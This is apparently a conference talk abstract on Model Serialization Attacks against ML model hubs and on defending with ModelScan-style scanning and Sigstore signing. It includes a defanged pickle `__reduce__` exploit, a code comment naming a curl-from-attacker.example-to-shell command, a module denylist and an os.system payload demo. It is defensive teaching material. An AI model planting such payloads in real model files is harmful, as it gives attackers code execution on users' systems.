Trojan Model Hubs: Hacking ML Supply Chains & Defending Yourself from Threats


Increasingly, ML practitioners rely on public model hubs like Hugging Face to download foundation models for fine-tuning. However, because model hubs are open by design, compromised artifacts are easy to share and distribute. Most ML model formats are inherently vulnerable to Model Serialization Attacks (MSAs): the injection of malicious code that executes automatically when the model file is deserialized. MSAs are the Trojan horses of ML, capable of turning a seemingly innocuous model into a backdoor into your whole system. An attacker could download a popular model, inject malicious code, and re-upload it under a similar name to trick consumers. This problem is not purely theoretical: 3,354 public models on Hugging Face today are capable of arbitrary code execution upon deserialization, and 41% of those are not flagged as unsafe by Hugging Face. Even beyond the risk of public registries, privately created models can also be subject to MSAs if their storage system is infiltrated and a safe model is swapped for one that makes identical inferences but also executes malicious code.
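To make the mechanism concrete: Python's pickle format, still common for model checkpoints, lets an object dictate its own reconstruction via `__reduce__`. The sketch below is a hypothetical, defanged MSA; a list append stands in for the shell command a real attacker would run.

```python
import pickle

executed = []

def payload(msg):
    # Benign stand-in for what a real attack would run here,
    # e.g. os.system("curl https://attacker.example/x.sh | sh").
    executed.append(msg)
    return msg

class PoisonedModel:
    # pickle calls __reduce__ to learn how to rebuild an object.
    # An attacker returns an arbitrary callable plus its arguments,
    # and pickle invokes that callable during deserialization.
    def __reduce__(self):
        return (payload, ("arbitrary code ran at load time",))

blob = pickle.dumps(PoisonedModel())  # bytes of the poisoned "model" file
pickle.loads(blob)                    # the victim merely loads the model...
print(executed)                       # ...and the payload has already run
```

Note that the payload fires during `pickle.loads` itself, before the victim ever calls or inspects the loaded object.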

So, what can you do about it? In this talk, we will explore two strategies for mitigating the risk of MSAs and other attacks involving compromised artifacts: model scanning and cryptographic signing. Model scanning is our window into the black boxes that are model files. By scanning a model before deserialization, we can examine the operators and layers it uses and determine whether it contains suspicious code, without actually unpacking it and exposing ourselves to the attack. In addition, cryptographic attestation can link an artifact to a source’s identity, backed by a trusted authority. A model can be signed on creation; then, whenever it is used, consumers can verify the signature to establish its integrity and authenticity. Scan results can also be signed, attesting that the creator verified the model was free of malicious code at the time of signing.
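The idea of scanning without deserializing can be illustrated with a toy opcode-level scanner: it walks a pickle stream's opcodes and flags imports from dangerous modules, without ever calling `pickle.loads`. This is in the spirit of real scanners, not their implementation; the denylist is hypothetical, and the dump is pinned to pickle protocol 2 so imports appear as single `GLOBAL` opcodes.

```python
import os
import pickle
import pickletools

# Hypothetical denylist; production scanners maintain curated lists
# of dangerous operators and imports.
UNSAFE_MODULES = {"os", "posix", "nt", "subprocess", "builtins"}

class PoisonedModel:
    # On load, pickle would call os.system with the attacker's command.
    def __reduce__(self):
        return (os.system, ("echo pwned",))

def scan_pickle(blob: bytes) -> list:
    """Flag suspicious imports by walking the opcode stream,
    never calling pickle.loads() on the untrusted bytes."""
    findings = []
    for opcode, arg, _pos in pickletools.genops(blob):
        # Protocols <= 3 encode imports as GLOBAL "module qualname".
        if opcode.name == "GLOBAL":
            module = str(arg).split()[0]
            if module in UNSAFE_MODULES:
                findings.append(str(arg))
    return findings

poisoned = pickle.dumps(PoisonedModel(), protocol=2)
clean = pickle.dumps({"weights": [0.1, 0.2]}, protocol=2)
print(scan_pickle(poisoned))  # flags the os.system import
print(scan_pickle(clean))     # []
```

Because `pickletools.genops` only parses opcodes, the malicious callable is surfaced without ever being executed.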

Both scanning and signing are industry standards for most software artifacts. Many of us are familiar with typical antivirus scans, or with signing and attesting container images when pushing to or pulling from a container registry. These practices map naturally onto ML artifacts, aided by advances in open-source security tools. We will show how you can use ModelScan to scan for MSAs, then use Sigstore to sign models and scan results, backed by an immutable public ledger. With practices like these, we can stop the MSA Trojan horses at the gates and make ML more secure for everyone.
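The sign-then-verify workflow for models and scan reports can be sketched as follows. An HMAC over a shared secret stands in for the signer's identity here; real Sigstore signing is keyless, binding signatures to an OIDC identity and recording them in a public transparency log (Rekor). The file name and report shape are illustrative.

```python
import hashlib
import hmac
import json

# Demo secret only -- a stand-in for a real signing identity.
SIGNING_KEY = b"demo-key-not-for-production"

def sign(payload: bytes) -> str:
    return hmac.new(SIGNING_KEY, payload, hashlib.sha256).hexdigest()

def verify(payload: bytes, signature: str) -> bool:
    return hmac.compare_digest(sign(payload), signature)

model_bytes = b"...serialized model bytes..."  # illustrative placeholder
scan_report = json.dumps({"file": "model.pkl", "issues": []}).encode()

# Producer signs both the model and its scan report at release time.
model_sig = sign(model_bytes)
report_sig = sign(scan_report)

# Consumers verify before loading; any tampering breaks verification.
print(verify(model_bytes, model_sig))              # True
print(verify(model_bytes + b"tamper", model_sig))  # False
print(verify(scan_report, report_sig))             # True
```

Signing the scan report alongside the model is what lets a consumer check not only who published the artifact, but that it passed a scan at publication time.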


William is a Senior Software Engineer at Protect AI, where he is building systems to help ML engineers and data scientists introduce security into their MLOps workflows effortlessly. Previously, he led a team at AWS working on application observability and distributed tracing. During that time he contributed to the industry-wide OpenTelemetry standard and helped lead the effort to release an AWS-supported distribution of it. He is passionate about making the observability and security of AI-enabled applications as seamless as possible.

Open Data Science
One Broadway
Cambridge, MA 02142
